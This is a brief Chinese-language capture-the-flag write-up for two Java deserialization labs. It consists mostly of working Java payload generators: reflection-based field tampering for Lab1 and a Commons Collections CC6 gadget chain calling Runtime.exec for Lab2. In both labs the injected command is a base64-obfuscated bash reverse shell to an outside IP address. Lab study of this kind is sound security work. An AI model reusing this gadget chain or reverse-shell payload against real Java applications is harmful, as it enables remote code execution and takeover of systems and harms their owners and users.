Write-UpJavaDeserializeLabs
SherlockLab1
在java中对于bash命令的执行会把它按照空格分成三部分,也就是反弹shell命令中只能存在两个空格
序列化脚本如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25
| package yxxx.javasec.deserialize;
import com.yxxx.javasec.deserialize.Calc; import com.yxxx.javasec.deserialize.Utils;
import java.io.ByteArrayOutputStream; import java.io.ObjectOutputStream; import java.lang.reflect.Field;
public class Test { public static void main(String[] args) throws Exception { Calc calc = new Calc(); Class c = calc.getClass(); Field field = c.getDeclaredField("canPopCalc"); field.setAccessible(true); field.set(calc,true); Field field1 = c.getDeclaredField("cmd"); field1.setAccessible(true); field1.set(calc,"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTMuMTAyLjQ2Lzc3NzcgMD4mMQ0K}|{base64,-d}|{bash,-i}"); ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream); objectOutputStream.writeObject(calc); System.out.println(Utils.bytesTohexString(byteArrayOutputStream.toByteArray())); } }
|
Lab2
该题题目没有提供任何的类供我们来解决问题,但是我们看提供的库里面有CommonsCollections依赖,这样的话我们就可以利用cc链实现反序列化,达到rce的目的
由于像cc1等链会受到jdk版本的限制,所以我们这边使用不会受版本限制的一条链,也就是cc6,所以我们的payload如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51
| package org.example.lab2.demos.web;
import com.yxxx.javasec.deserialize.Utils; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap;
import java.io.*; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Proxy; import java.util.HashMap; import java.util.Map;
public class Sherlock { public static void main(String[] args) throws Exception { Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}), new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}), new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTMuMTAyLjQ2Lzc3NzcgMD4mMQ0K}|{base64,-d}|{bash,-i}"}) }; ChainedTransformer chainedTransformer = new ChainedTransformer(transformers); HashMap<Object, Object> map = new HashMap<>(); Map<Object, Object> lazyMap = LazyMap.decorate(map, new ConstantTransformer(1)); TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "aaa"); HashMap<Object, Object> map2 = new HashMap<>(); map2.put(tiedMapEntry, "bbb"); lazyMap.remove("aaa");
Class c = LazyMap.class; Field factoryField = c.getDeclaredField("factory"); factoryField.setAccessible(true); factoryField.set(lazyMap, chainedTransformer); ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream); objectOutputStream.writeUTF("SJTU"); objectOutputStream.writeInt(1896); objectOutputStream.writeObject(map2); System.out.println(Utils.bytesTohexString(byteArrayOutputStream.toByteArray()));
} }
|